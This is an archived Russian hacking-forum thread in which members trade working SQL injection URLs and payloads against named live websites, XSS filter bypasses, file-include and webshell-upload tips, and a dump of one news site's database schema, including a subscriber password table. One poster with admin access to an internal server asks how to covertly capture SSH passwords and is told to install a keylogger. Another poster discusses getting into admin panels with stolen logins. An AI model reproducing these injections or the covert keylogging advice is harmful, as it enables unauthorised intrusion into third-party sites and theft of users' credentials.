jav ascript:alert('На_сайте_обнаружен _XSS_уязвимость'); (сдесь табуляция)
работает
че за нах (((.

Ну предположим все что я сказал выше чушь собачья, тогда если сайт фильтрует текст <script> нече сделать больше и неполучиться ? низрена не так ! вот _http://ha.ckers.org/xss.html да и на всех статьях на форуме подобной описываеться !!!!
так в чем всетаки проблема ?(
<IMG SRC="jav[TAB]ascript:alert('XSS');"> и < scr ip t > это всеже совершенно разные вещи - в первом случае ты TAB вставляешь в атрибут тега, а во втором - в имя тега. Любой нормальный браузер вообще не будет это интерпретировать как тег.

desTiny
25.04.2009, 19:58
diznt, тогда меняй сканер )

Grookle
26.04.2009, 02:06
Доброго времени суток Товарищи.Имеется инъекция в которой выводятся база юзер и версия но при попытке вывода таблиц из INFORMATION_SCHEMA появляется ошибка Not Acceptable

An appropriate representation of the requested resource /sex.php could not be found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache Server at www.site.com Port 80
Кто нибудь сталкивался с этим?

diznt
26.04.2009, 02:11
Grookle сылку в студию
посмотрим что у вас там
так просто нельзя что нибуть сказать

Grookle
26.04.2009, 02:17
Skinul v LS

ph1l1ster
26.04.2009, 11:33
Grookle, mod_security мещает. пробуй разные запросы

DrAssault
26.04.2009, 12:08
Grookle линк в студию...

n1ceque
26.04.2009, 16:59
как можно обойти HIDE в темах Vbulletin...??

AngelOfFaith
26.04.2009, 20:48
Можно ли здесь чёта провернуть:
$update = mysql_query("UPDATE `chat_users` SET `time` = '".$online."', `place` = 0, `ip` = '".getenv('REMOTE_ADDR')."', `ua` = '".htmlspecialchars(getenv('HTTP_USER_AGENT'))."' WHERE `id` = '".$id."';");

если вставить свой код в HTTP_USER_AGENT? И если да то какой код надо? Заранее спс за ответ

ElteRUS
26.04.2009, 22:18
если вставить свой код в HTTP_USER_AGENT?


Ну да. бенчмарк можно заюзать или мор1ров. Будет что-то вроде такого пакета


GET /script.php HTTP/1.1
Host: site.com
User-Agent: 1' and 1=(select null from members where length(if(ascii(substring((select pass from members where id=1),1,1))>1,pass,id))>1)/*
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Keep-Alive: 300
Connection: keep-alive



И если да то какой код надо?


А это тебе виднее. Чего ты хочешь добиться то от инъекции ?
Рекомендую почитать http://forum.antichat.ru/thread35207.html


как можно обойти HIDE в темах Vbulletin...??


https://forum.antichat.ru/showthread.php?t=26987
С тех пор ничего не изменилось =)
Я надеюсь ты не на нулледе хайды хенкать хоч ?)) А то люди значит постят, стараются, работают на коллективное благо так сказать, а ты на все готовенькое хочешь ? Не хорошо, товарищ, не хорошо

AngelOfFaith
26.04.2009, 22:31
хм, я читал эту статью только у меня постоянно белая страница вылазит(((
Как с этим боротся?

Nightmarе
26.04.2009, 22:48
Ещё один вопрос.
На сайте есть уязвимость выполнение php кода (php inj), однако запись практически везде запрещена, ну куда-то запись конечно есть.
Выполнение системных команд там невозможно как и инклуд.
Папки аватаров и прочей хрени тоже нету.
Что в этой ситуации можно сделать для залития шелла?

DimOnOID
27.04.2009, 00:37
tmp Должен быть доступен для записи....можешь туда залить...и инклудить при желании.

PaCo
27.04.2009, 16:20
Подскажите здесь можно что то зделать, вот sql:

http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+order+by+9--+

union не выходит провести(возможно еще как то изменяеться запрос и т.п. а возможно и бд не держит), а при blind как я понял фильтруються СКОБКИ.

БД по всей видимости MySQL:

http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+and+@@global.sort_buffer_size+--+


но вот скобки скрипт по всей видимости не переваривает(именно одновременно 2-е скобки - открываюшиеся и закрываюшиеся):

http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+and+1=1--+

http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+and+(1)=1--+


и в hex тоже

http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+and+%281%29=1--+

Rav1n
27.04.2009, 17:37
чем можно сдампить ms sql базу?

чтобы руками не перебирать например такое
=1'+or+1=(select+top+1+cast(aliase+as+nvarchar)+fr om+part_pass+where+inc=1)--
1 потом 2,3 итд

mailbrush
27.04.2009, 17:39
хз, вроде нету таких тулз. для мускуля есть сипт4. напиши скрипт пхп простенький

Pashkela
27.04.2009, 18:05
http://pashkela.narod.ru/progi/bsqlbf-v2.1.zip

o3,14um
27.04.2009, 18:14
чем можно сдампить ms sql базу?

чтобы руками не перебирать например такое
=1'+or+1=(select+top+1+cast(aliase+as+nvarchar)+fr om+part_pass+where+inc=1)--
1 потом 2,3 итд
Pangolin может, читал в обзоре, сам не пробовал

[Raz0r]
28.04.2009, 13:08
чем можно сдампить ms sql базу?

чтобы руками не перебирать например такое
=1'+or+1=(select+top+1+cast(aliase+as+nvarchar)+fr om+part_pass+where+inc=1)--
1 потом 2,3 итд
http://kachakil.com/papers/SFX-SQLi-Bin.zip (если mssql 2005/2008)

mailbrush
28.04.2009, 16:15
Каким запросом производить инъекцию в ibase?

Conroe
28.04.2009, 16:50
Помогите, пожалуйста, разобраться, только постигаю азы:
запрос: news.php?id=-349+union+select+1,2,3,4,5,6,7,8,9--
потом: news.php?id=-349+union+select+1,table_name,3,4,5,6,7,8,9+from+i nformation_schema.tables+limit+1,1--
получаю имена таблиц:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
и т.д.
далее пытаюсь определить столбцы, делаю:
news.php?id=-349+union+select+1,column_name,3,4,5,6,7,8,9+from+ information_shema.columns+where+ table_name='имя_таблицы'+limit+1,1--
и тут тишина.... страница открывается ак же как при запросе: news.php?id=349'
по version() выдает: 5.0.67-0ubuntu6
как быть дальше?

ph1l1ster
28.04.2009, 16:51
magic_quotes режет.

имя_таблицы в хексе делай.

типа так: table_name=0x7573657273
x3k.ru

mailbrush
28.04.2009, 17:10
www.philology.kiev.ua/php/kafkaf.php?id=7&sid=2Инклюд. Уязвим параметр id. Но вот расскрутить не могу. Help me, please!

Conroe
28.04.2009, 17:11
news.php?id=-349+union+select+1,column_name,3,4,5,6,7,8,9+from+ information_shema.columns+where+table_name='0x434f 4c4c4154494f4e53'+limit+1,1--

table_name=COLLATIONS
пробовал маленькими буквами т.к. хекс для них разный :(

geezer.code
28.04.2009, 17:21
news.php?id=-349+union+select+1,column_name,3,4,5,6,7,8,9+from+ information_shema.columns+where+table_name='0x434f 4c4c4154494f4e53'+limit+1,1--

table_name=COLLATIONS
пробовал маленькими буквами т.к. хекс для них разный :(
кавычки тут не нужны, так как для mysql это уже 16ричное представление строки.
news.php?id=-349+union+select+1,column_name,3,4,5,6,7,8,9+from+ information_shema.columns+where+table_name=0x434f4 c4c4154494f4e53+limit+1,1--

как раз кавычки и обламывают тебе инъекцию, точнее ее обламывает magic_quotes_gpc= ON
эта опция экранирует спецсимволы такие как кавычка и нуллбайт итд.
при этом сервер получает запрос вида блаблабла where table_name=\'collations\'
а такой запрос не является синтакисчески верным.

Conroe
28.04.2009, 17:24
кавычки тут не нужны, так как для mysql это уже 16ричное представление строки.
news.php?id=-349+union+select+1,column_name,3,4,5,6,7,8,9+from+ information_shema.columns+where+table_name=0x434f4 c4c4154494f4e53+limit+1,1--

пробовал результат одинаковый

geezer.code
28.04.2009, 17:29
пробовал результат одинаковый
линк сюда, либо в пм.


зы +from+ information_schema.columns+

Conroe
28.04.2009, 17:33
линк сюда, либо в пм.


зы +from+ information_schema.columns+
:mad: :( :confused: :eek: долбанная невнимательность

farex
28.04.2009, 18:02
Может для начинающего это и лишния информация, но все таки...
Дабы упростить поск таблиц где есть поля "login"&"password" к (примеру..
Можно воспользоваться оператором like
Синтаксис такой:
news.php?id=-349+union+select+1,concat_ws(0x3a,table_name,table _schema),3,4,5,6,7,8,9+from+ information_shema.columns+where+column_name+like+' password'--+
Данный запрос выведет:
Имя таблици и названия базы, где есть поля password/* так же при необходимости слово password моно перевести в 16й код..
Так же моно листать через оператор limit
news.php?id=-349+union+select+1,concat_ws(0x3a,table_name,table _schema),3,4,5,6,7,8,9+from+ information_shema.columns+where+column_name+like+' password'+limit+1,1--+

mailbrush
28.04.2009, 18:18
И к чему это? Прочти <title>(.*)</title>

farex
28.04.2009, 18:24
Ну вообще чел тока начинает крутить скули......
Это инфа, к общему развитию.....

AkyHa_MaTaTa
28.04.2009, 18:28
Чисто password не всегда бывает, тогда уже '%pass%' или в хексе при слешировании кавычек.

Conroe
28.04.2009, 18:51
Может для начинающего это и лишния информация, но все таки...
Дабы упростить поск таблиц где есть поля "login"&"password" к (примеру..
Можно воспользоваться оператором like
Синтаксис такой:
news.php?id=-349+union+select+1,concat_ws(0x3a,table_name,table _schema),3,4,5,6,7,8,9+from+ information_schema.columns+where+column_name+like+ 'password'--+
Данный запрос выведет:
Имя таблици и названия базы, где есть поля password/* так же при необходимости слово password моно перевести в 16й код..
Так же моно листать через оператор limit
news.php?id=-349+union+select+1,concat_ws(0x3a,table_name,table _schema),3,4,5,6,7,8,9+from+ information_schema.columns+where+column_name+like+ 'password'+limit+1,1--+
а данный запрос выводит одно название базы где есть поля password/* или все?
получаем: Subscription:dvb т.е. table_name=Subscription
db_name=dvb ?

farex
28.04.2009, 19:01
а данный запрос выводит одно название базы где есть поля password/* или все?
получаем: Subscription:dvb т.е. table_name=Subscription
db_name=dvb ?
Выводит названия базы и таблицу(в этой базе), где находятся колонка "password"

table_name=Subscription: имя таблици где есть колонка "password"
table_schema: имя бд в которой находится таблица "Subscription"
с колонкой "password"

Conroe
28.04.2009, 19:10
table_name=Subscription - имя таблици где есть колонка "password"
db_name=dvb - имя бд в которой находится таблица "Subscription"
с колонкой "password"

:D вот с этим не сопоставимо:http://xxx/news.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM Users LIMIT 1,1 -- видимо устаревает информация
Для вывода логина и пасс делаем:
-349+union+select+1,concat_ws(0x3a,login,password), 3,4,5,6,7,8,9+from+хекс(Subscription)+limit+1, 1
или же как-то подругому?

Для вывода логина и пасс имя БД нам необязательно? т.к. запросы все равно идут в пределах базы, к которой обращается скрипт.

farex
28.04.2009, 19:27
Для вывода логина и паса....(Когда ты уже узнал названия столбцов разумеется.
Делается так:
-349+union+select+1,concat_ws(0x3a,login,password), 3,4,5,6,7,8,9+from+table_name
где, table_name -это названия таблици (от кудого ты вытащил(login&password))
Для вывода логина и пасс имя БД нам необязательно?
Обязательно, лишm в том случае если таблица находится в другой базе ...
Например:
349+union+select+1,database(), 3,4,5,6,7,8,9
нам вывело, что названия БД "test"
а
349+union+select+1,table_schema, 3,4,5,6,7,8,9+from+information_schema.columns+wher e+table_name='users'
нам выдало, что таблица users находится в базе test1
тогда, для вывода, используем следующий запрос...
349+union+select+1,concat_ws(0x3a,login,password), 3,4,5,6,7,8,9+from+test1.users

Conroe
28.04.2009, 20:07
совсем запутался...
имеем: http://english.dvb.no/news.php?id=-349+union+select+1,concat_ws(0x3a,table_name,table _schema),3,4,5,6,7,8,9+from+information_schema.col umns+where+column_name+like+0x70617373776f7264--

Subscription:dvb
соотв в базе dvb есть таблица Subscription в которой есть колонка(столбец) password
database ()= dvb
запрос:
http://english.dvb.no/news.php?id=-349+union+select+1,concat_ws(0x3a,login,password), 3,4,5,6,7,8,9+from+0x537562736372697074696f6e--
ничего не дает, видимо мы не знаем, а login ли мы ищем? правильно?
как достать его "login"?

Jokester
28.04.2009, 20:14
Conroe
что это?
from+0x537562736372697074696f6e

Обязательно посмотри мою подпись (красненьким)

Conroe
28.04.2009, 20:17
from+0x537562736372697074696f6e ----> хекс Subscription

p.s. спасибо за подпись, все что читал далеко от сегодняшнего дня
в основном по SQL-inj читал https://forum.antichat.ru/threadnav43966-1-10.html

AkyHa_MaTaTa
28.04.2009, 20:20
Вот собственно все базы и таблички доступные тукушему юзеру(без Information):

dvb.B_Banner_Counter=>id
dvb.B_Banner_Counter=>hdr
dvb.B_Banner_Pages=>id
dvb.B_Banner_Pages=>filename
dvb.B_Banner_Pages=>page
dvb.B_Banners=>ID
dvb.B_Banners=>BannerName
dvb.B_Banners=>Banner_Image
dvb.B_Banners=>URL
dvb.B_Banners=>url_type
dvb.B_Banners=>position
dvb.B_Banners=>pages
dvb.B_Banners=>Active
dvb.B_Comment=>ID
dvb.B_Comment=>Date
dvb.B_Comment=>Name
dvb.B_Comment=>Comment
dvb.B_Comment=>Country
dvb.B_Comment=>Email
dvb.B_Comment=>PhotoName
dvb.B_Comment=>Display
dvb.B_Contact=>ID
dvb.B_Contact=>Title
dvb.B_Contact=>Address
dvb.B_Contact=>Phone
dvb.B_Contact=>Email
dvb.B_Contact=>DispOrder
dvb.B_Docs=>ID
dvb.B_Docs=>Title
dvb.B_Docs=>Date
dvb.B_Docs=>Description
dvb.B_Docs=>Keywords
dvb.B_Docs=>DocName
dvb.B_Docs=>PhotoName
dvb.B_Docs=>VoiceName
dvb.B_Docs_Related=>ID
dvb.B_Docs_Related=>News_ID
dvb.B_Docs_Related=>Related
dvb.B_Featured_Comments=>ID
dvb.B_Featured_Comments=>Date
dvb.B_Featured_Comments=>Name
dvb.B_Featured_Comments=>Comment
dvb.B_Featured_Comments=>Country
dvb.B_Featured_Comments=>Email
dvb.B_Featured_Comments=>Article
dvb.B_Featured_Comments=>Display
dvb.B_History=>ID
dvb.B_History=>MonthDay
dvb.B_History=>Year
dvb.B_History=>Date
dvb.B_History=>Details
dvb.B_History=>Keywords
dvb.B_History=>PhotoName
dvb.B_History=>Approved
dvb.B_LetsTalk=>ID
dvb.B_LetsTalk=>Topic
dvb.B_LetsTalk=>Discussion
dvb.B_LetsTalk=>PhotoName
dvb.B_LetsTalk=>Photo2
dvb.B_LetsTalk=>UsePhoto2
dvb.B_LetsTalk=>Main
dvb.B_LetsTalk_Response=>ID
dvb.B_LetsTalk_Response=>Topic
dvb.B_LetsTalk_Response=>Name
dvb.B_LetsTalk_Response=>Country
dvb.B_LetsTalk_Response=>Email
dvb.B_LetsTalk_Response=>Comment
dvb.B_LetsTalk_Response=>DocName
dvb.B_LetsTalk_Response=>Approved
dvb.B_News=>ID
dvb.B_News=>Title
dvb.B_News=>Date
dvb.B_News=>Article
dvb.B_News=>Keywords
dvb.B_News=>PhotoName
dvb.B_News=>PhotoCap1
dvb.B_News=>PhotoName2
dvb.B_News=>PhotoCap2
dvb.B_News=>PhotoName3
dvb.B_News=>PhotoCap3
dvb.B_News=>Viewed
dvb.B_News=>Featured
dvb.B_News=>Added
dvb.B_News=>Archive
dvb.B_News=>VoiceName
dvb.B_News=>Wire
dvb.B_News=>Opinion
dvb.B_News=>Interview
dvb.B_News=>Breaking
dvb.B_News=>Show_H
dvb.B_News=>PhotoArticle
dvb.B_News=>Local
dvb.B_News_Related=>ID
dvb.B_News_Related=>News_ID
dvb.B_News_Related=>Related
dvb.B_Photo_Category=>ID
dvb.B_Photo_Category=>Cat
dvb.B_Photo_Category=>Parent
dvb.B_Photos=>ID
dvb.B_Photos=>Title
dvb.B_Photos=>Date
dvb.B_Photos=>Caption
dvb.B_Photos=>PhotoName
dvb.B_Photos=>PhotoName2
dvb.B_Photos=>CapName
dvb.B_Photos=>Archive
dvb.B_Photos=>Related
dvb.B_Photos=>Category1
dvb.B_Photos=>Category
dvb.B_Photos=>Keywords
dvb.B_Photos=>Credit
dvb.B_Photos=>Main
dvb.B_Programs=>ID
dvb.B_Programs=>Title
dvb.B_Programs=>Description
dvb.B_Programs=>SoundName
dvb.B_Programs=>DayOfWeek
dvb.B_Programs_Date=>ID
dvb.B_Programs_Date=>Display
dvb.B_Site_Category=>ID
dvb.B_Site_Category=>Cat
dvb.B_Sites=>ID
dvb.B_Sites=>Name
dvb.B_Sites=>URL
dvb.B_Sites=>Description
dvb.B_Sites=>Keywords
dvb.B_Sites=>Category
dvb.B_Sites=>Email
dvb.B_Sites=>Country
dvb.B_Sites=>Approved
dvb.B_Sites_Related=>ID
dvb.B_Sites_Related=>News_ID
dvb.B_Sites_Related=>Related
dvb.B_TVNews=>ID
dvb.B_TVNews=>Title
dvb.B_TVNews=>Date
dvb.B_TVNews=>Article
dvb.B_TVNews=>Keywords
dvb.B_TVNews=>PhotoName
dvb.B_TVNews=>VideoName
dvb.B_TVNews=>Featured
dvb.B_TVNews=>Archive
dvb.B_TVNews=>VidDoc
dvb.B_TVNews=>PhotoArticle
dvb.B_Vote=>ID
dvb.B_Vote=>Topic
dvb.B_Vote=>Type
dvb.B_Vote=>Main
dvb.B_Vote_Results=>ID
dvb.B_Vote_Results=>Topic
dvb.B_Vote_Results=>Choice
dvb.B_Vote_Results=>Votes
dvb.B_Vote_Results=>IP_Add
dvb.B_Votes=>ID
dvb.B_Votes=>Topic
dvb.B_Votes=>Choice
dvb.B_Votes=>Vote
dvb.B_Votes=>IP_Add
dvb.E_Aboutus=>id
dvb.E_Aboutus=>title
dvb.E_Aboutus=>Description
dvb.E_Aboutus=>main
dvb.E_Banner_Counter=>id
dvb.E_Banner_Counter=>hdr
dvb.E_Banner_Pages=>id
dvb.E_Banner_Pages=>filename
dvb.E_Banner_Pages=>page
dvb.E_Banners=>ID
dvb.E_Banners=>BannerName
dvb.E_Banners=>Banner_Image
dvb.E_Banners=>URL
dvb.E_Banners=>url_type
dvb.E_Banners=>position
dvb.E_Banners=>pages
dvb.E_Banners=>Active
dvb.E_Comment=>ID
dvb.E_Comment=>Date
dvb.E_Comment=>Name
dvb.E_Comment=>Comment
dvb.E_Comment=>Country
dvb.E_Comment=>Email
dvb.E_Comment=>PhotoName
dvb.E_Comment=>Display
dvb.E_Contact=>ID
dvb.E_Contact=>Title
dvb.E_Contact=>Address
dvb.E_Contact=>Phone
dvb.E_Contact=>Email
dvb.E_Contact=>DispOrder
dvb.E_Docs=>ID
dvb.E_Docs=>Title
dvb.E_Docs=>Date
dvb.E_Docs=>Description
dvb.E_Docs=>Keywords
dvb.E_Docs=>DocName
dvb.E_Docs=>PhotoName
dvb.E_Docs=>VoiceName
dvb.E_Docs_Related=>ID
dvb.E_Docs_Related=>News_ID
dvb.E_Docs_Related=>Related
dvb.E_Donation=>id
dvb.E_Donation=>Description
dvb.E_Donation=>main
dvb.E_Donation=>title
dvb.E_History=>ID
dvb.E_History=>MonthDay
dvb.E_History=>Year
dvb.E_History=>Date
dvb.E_History=>Details
dvb.E_History=>Keywords
dvb.E_History=>PhotoName
dvb.E_History=>Approved
dvb.E_LetsTalk=>ID
dvb.E_LetsTalk=>Topic
dvb.E_LetsTalk=>Discussion
dvb.E_LetsTalk=>PhotoName
dvb.E_LetsTalk=>Photo2
dvb.E_LetsTalk=>Main
dvb.E_LetsTalk_Response=>ID
dvb.E_LetsTalk_Response=>Topic
dvb.E_LetsTalk_Response=>Name
dvb.E_LetsTalk_Response=>Country
dvb.E_LetsTalk_Response=>Email
dvb.E_LetsTalk_Response=>Comment
dvb.E_LetsTalk_Response=>DocName
dvb.E_LetsTalk_Response=>Approved
dvb.E_News=>ID
dvb.E_News=>Title
dvb.E_News=>Date
dvb.E_News=>Article
dvb.E_News=>Keywords
dvb.E_News=>PhotoName
dvb.E_News=>PhotoCap1
dvb.E_News=>PhotoName2
dvb.E_News=>PhotoCap2
dvb.E_News=>PhotoName3
dvb.E_News=>PhotoCap3
dvb.E_News=>Viewed
dvb.E_News=>Featured
dvb.E_News=>Added
dvb.E_News=>Archive
dvb.E_News=>VoiceName
dvb.E_News=>Wire
dvb.E_News=>Opinion
dvb.E_News=>Interview
dvb.E_News=>Breaking
dvb.E_News=>Show_H
dvb.E_News_Related=>ID
dvb.E_News_Related=>News_ID
dvb.E_News_Related=>Related
dvb.E_Photo_Category=>ID
dvb.E_Photo_Category=>Cat
dvb.E_Photo_Category=>Parent
dvb.E_Photos=>ID
dvb.E_Photos=>Title
dvb.E_Photos=>Date
dvb.E_Photos=>Caption
dvb.E_Photos=>PhotoName
dvb.E_Photos=>PhotoName2
dvb.E_Photos=>Archive
dvb.E_Photos=>Related
dvb.E_Photos=>Category1
dvb.E_Photos=>Category
dvb.E_Photos=>Keywords
dvb.E_Photos=>Credit
dvb.E_Photos=>Main
dvb.E_Site_Category=>ID
dvb.E_Site_Category=>Cat
dvb.E_Sites=>ID
dvb.E_Sites=>Name
dvb.E_Sites=>URL
dvb.E_Sites=>Description
dvb.E_Sites=>Keywords
dvb.E_Sites=>Category
dvb.E_Sites=>Email
dvb.E_Sites=>Country
dvb.E_Sites=>Approved
dvb.E_Sites_Related=>ID
dvb.E_Sites_Related=>News_ID
dvb.E_Sites_Related=>Related
dvb.E_Vote=>ID
dvb.E_Vote=>Topic
dvb.E_Vote=>Type
dvb.E_Vote=>Main
dvb.E_Vote_Results=>ID
dvb.E_Vote_Results=>Topic
dvb.E_Vote_Results=>Choice
dvb.E_Vote_Results=>Votes
dvb.E_Vote_Results=>IP_Add
dvb.E_Votes=>ID
dvb.E_Votes=>Topic
dvb.E_Votes=>Choice
dvb.E_Votes=>Vote
dvb.E_Votes=>IP_Add
dvb.E_video=>id
dvb.E_video=>name
dvb.E_video=>email
dvb.E_video=>v_name
dvb.Email_Info=>ID
dvb.Email_Info=>Subject
dvb.Email_Info=>Message
dvb.Email_Info=>Description
dvb.SMS_Codes=>Id
dvb.SMS_Codes=>code
dvb.SMS_Codes=>country
dvb.SMS_Codes=>provider
dvb.Subscription=>ID
dvb.Subscription=>Name
dvb.Subscription=>Email
dvb.Subscription=>Password
dvb.Subscription=>DailyNews
dvb.Subscription=>NewsUpdate
dvb.Subscription=>KeyWrdAlert
dvb.Subscription=>Type
dvb.Subscription=>Lang
dvb.Subscription=>Keywords
dvb.Subscription=>SMS
dvb.Subscription=>SMS_Code
dvb.Subscription=>SMS_Num
dvb.Subscription=>Active
dvb.Subscription=>TempDisable
dvb.Trans_Files=>ID
dvb.Trans_Files=>InstDate
dvb.Trans_Files=>File
dvb.Trans_Files=>Display
dvb.Trans_Files=>Archive
dvb.Trans_Files=>Latest
dvb.verification_codes=>id
dvb.verification_codes=>image
dvb.verification_codes=>code
dvb.verification_counter=>id
dvb.verification_counter=>rotator

крч ничего инетересного
З.Ы.Сорри за изврат.

farex
28.04.2009, 20:20
Conroe
RTFM!!! ......читай внимательнее, и все встанет, на свои места...

Conroe
28.04.2009, 20:30
Вот собственно все базы и таблички доступные тукушему юзеру(без Information):

крч ничего инетересного
З.Ы.Сорри за изврат.
чем можно получить данную информацию так быстро?

RTFM!!! ......читай внимательнее, и все встанет, на свои места...
ок, пошел читать и ковыряться..... (

ph1l1ster
28.04.2009, 20:33
www.philology.kiev.ua/php/kafkaf.php?id=7&sid=2Инклюд. Уязвим параметр id. Но вот расскрутить не могу. Help me, please!

http://www.philology.kiev.ua/php/kafkaf.php?id=http://site.com&sid=2

на site.com, 2/stitle.txt и 2/body.txt инклудит, только текст. php нет.

sections.php не инклудит никак. надо тормошить с 2/stitle.txt и 2/body.txt

Pashkela
28.04.2009, 20:42
2 ph1l1ster:


URL file-access is disabled in the server configuration

fervex
28.04.2009, 23:03
Здравствуйте! :)


Есть доступ по RDP администраторский (win 2003 server), сервер находится во внутренней сети (захожу через VPN). В той сети есть другие машины, на которые админы через ssh заходят с данного сервера.

Подскажите, как узнать их пароли и логины на ssh других машин?

Что поставить, что сделать, только не заметно? (доступ к системе полный)


Спасибо! :)

ph1l1ster
28.04.2009, 23:32
Что поставить

кейлогер.

Conroe
29.04.2009, 13:08
как правильно задавать параметры базы и таблицы в хексе?
хекс(name_db.table_name) или hex(name_db).(table_name) ?

ILYAtirtir
29.04.2009, 13:14
hex('db.table')

Jokester
29.04.2009, 14:15
как правильно задавать параметры базы и таблицы в хексе?
хекс(name_db.table_name) или hex(name_db).(table_name) ?
Где ты собрался использовать базу и таблицу в хексе?

При выборке никакого хекса быть не должно. Т.е

select user from db.users <-------- вот тут никакого хекса

hex('db.table')
А вот тут никаких кавычек

geezer.code
29.04.2009, 14:42
вообще хексить db_name.table_name - не имеет смысла(кроме подзапросов), в information_schema инфа в таком виде не хранится.
насчет

Сообщение от ILYAtirtir
hex('db.table')
А вот тут никаких кавычек
\stroke\не совсем согласен\stroke\
дополню для ясности.
для получения хекс значения нужно именно select hex('mydb.users'); - с кавычками. А вот для получения данных из базы с обходом смешанных коллейтов, то кавычки - не нужны.

Jokester
29.04.2009, 15:16
geezer.code
Вернись на страницу назад и взгляни на пост #6882 , в нём уважаемый Conroe приводит вот такую забавную конструкцию :
http://english.dvb.no/news.php?id=-349+union+select+1,concat_ws(0x3a,login,password), 3,4,5,6,7,8,9+from+0x537562736372697074696f6e--
На основании этого, я сделал вывод, что хекс значение предполагается использовать именно сдесь. :)

Ну а по поводу получения hex значения строки через базу, безусловно, согласен

savigm
29.04.2009, 17:43
Как можно узнать исползуется-ли на ftp-сервере proftpd 1.3.1 mod_sql?
Под proftpd 1.3.1 есть сплоит, но он требует mod_sql - http://bugs.proftpd.org/show_bug.cgi?id=3173

fervex
29.04.2009, 18:25
Здравствуйте! :)


Есть доступ по RDP администраторский (win 2003 server), сервер находится во внутренней сети (захожу через VPN). В той сети есть другие машины, на которые админы через ssh заходят с данного сервера.

Подскажите, как узнать их пароли и логины на ssh других машин?

Что поставить, что сделать, только не заметно? (доступ к системе полный)


Спасибо!


кейлогер.

посоветуйте, какой кейлогер поставить, чтобы был незаметен для антивирусов и не светился админам?

Спасибо! :)

InFlame
29.04.2009, 18:43
Как можно узнать исползуется-ли на ftp-сервере proftpd 1.3.1 mod_sql?
Под proftpd 1.3.1 есть сплоит, но он требует mod_sql - http://bugs.proftpd.org/show_bug.cgi?id=3173
Подконнектиться к 21 порту и посмотреть Hello-сообщение, где-то в самом начале.
Например:
220---------- Welcome to Pure-FTPd [TLS] ----------

MurZeg
29.04.2009, 23:58
Может вопрос не по теме но я не нашел подходящего форума или темы для моего вопроса. В общем такая ситуация я достал логины и пароли для доступа в админку ко многим сайтам, все эти сайты расположены на одном крупном сервере и используют одну и туже ексклюзивную cms, сайты не детские а сделаные по заказу для владельцов фирм , тоесть если проще сказать сайты сделаные фирмой по професинальному созданию сайтов, но проблема состоит в том что в админку можна зайти только с ихнего сервера при попытке зайти с другого компа выскакивает ошибка 403. Я думаю не нада рассказывать что она означает. Внимание вопрос можна ли какнить обойти это, может сменой ip? Хотя как узнать их реальный ип и порт для меня остается загадкой. Может аопрос и звучит глупо, но я в этих делах не профи.

З.Ы вопрос чисто для интереса, с сайтами ничего серьезного я не собираюсь делать.

Spyder
30.04.2009, 00:05
видимо там .htaccess в котором прописаны ипы с которых разрешён вход. Если сможешь как нибудь удалить его, то можно, а так хз, только локальный инклуд поможет и то не факт(

savigm
30.04.2009, 00:44
Подконнектиться к 21 порту и посмотреть Hello-сообщение, где-то в самом начале.
Например:
Ты видимо не понял вопрос: меня интересует как узнать используется-ли на ftp-сервере mod_sql? Вот что выдает сервер при коннекте:
220 ProFTPD 1.3.1 Server (Good FTP Server).

MurZeg
30.04.2009, 01:09
видимо там .htaccess в котором прописаны ипы с которых разрешён вход. Если сможешь как нибудь удалить его, то можно, а так хз, только локальный инклуд поможет и то не факт(
У меня были догадки по поводу htaccess , но удалить я его точно не смогу, поставлю вопрос по другому: Можна ли узнать их рельный ип и порт чтобы использовать в качестве прокси, возможноли такое вообще?

ILYAtirtir
30.04.2009, 02:07
ip узнать можно но "использовать в качестве прокси" не выйдет)). Вообщем ломай тачку админа,ставь на неё прокси а потом заходи в админку(если канечно дело в ip)а вообще забей,гиблое дело

navigat0r
30.04.2009, 11:49
имеется IP.Board v2.3.5
но не могу залить шелл через атачи
также немогу через смайлы
пробывал через стили, тоже не выходит
может кто знает есчо способ??
http://forum.antichat.ru/threadnav11551-3-10.html

-m0rgan-
30.04.2009, 17:08
2MurZeg

Если есть права, можно записать в .htaccess с их ипами, свой.

MurZeg
30.04.2009, 22:24
Если есть права, можно записать в .htaccess с их ипами, свой.

А каким образом не подчкажеш?

PaCo
30.04.2009, 22:34
Самым прямым способом - через шелл например которого как я понял у тебя нету или ftp доступ которого по всей видимости у тебя тоже нету так что на этот можешь даже и не расчитывать.

Jokester
30.04.2009, 22:55
MurZeg
Если доступ в админку закрыт по IP то никак ты туда не попадёшь, кроме как с разрешённых айпишников.

-m0rgan-
Как всегда в своём репертуаре.
Мне интересно, ты сам как думаешь, если бы у него был доступ на запись .htaccess нахрена ему было-бы задавать тут эти вопросы и вообще ломиться в админку?

MurZeg
30.04.2009, 23:32
Мда плохи дела... Всем спасибо за ответ

-m0rgan-
30.04.2009, 23:35
2jokester
Иему нужен доступ в админку, на вход в акминку стоин ограничение по ипу по определённому диамозону, ИМХО.
Он нашол баг и получил пароли, но в админку зайти не может.
Ну почему бы ему не заюзать данный баг для получения доступа к .htaccess ?

Меня не посвещали, для чего ему нужен доступ в админ панель.

Возможно я ошибаюсь, но это моё личное мнение...

o3,14um
01.05.2009, 17:58
2MurZeg, попробуй поискать прокси, который подходит по данному диапазону (если ты его знаешь) - уже выручал такое =)
А вообще, можешь тупо попробовать данный пасс к ФТП\ССХ и прочим...
====
Ещё кстати вариант, тож встречался. Когда в Файле htaccess стоит ограницение по ИП только к Одному файлу, к примеру /admin/index.php, а ты попробуй прописать, к примеру /admin/admin.php и есть вероятность, что проканает

(это в случае если ещё и админка так реализована)

diznt
02.05.2009, 00:08
http://tinakandelaki.ru/index.php?page=press&id=-1+union+select+1,2,3,4,5--

При выявлении database() ниче не выскакивает (отчет о ошибках выключен я так пологаю) что делать?

.:[melkiy]:.
02.05.2009, 00:17
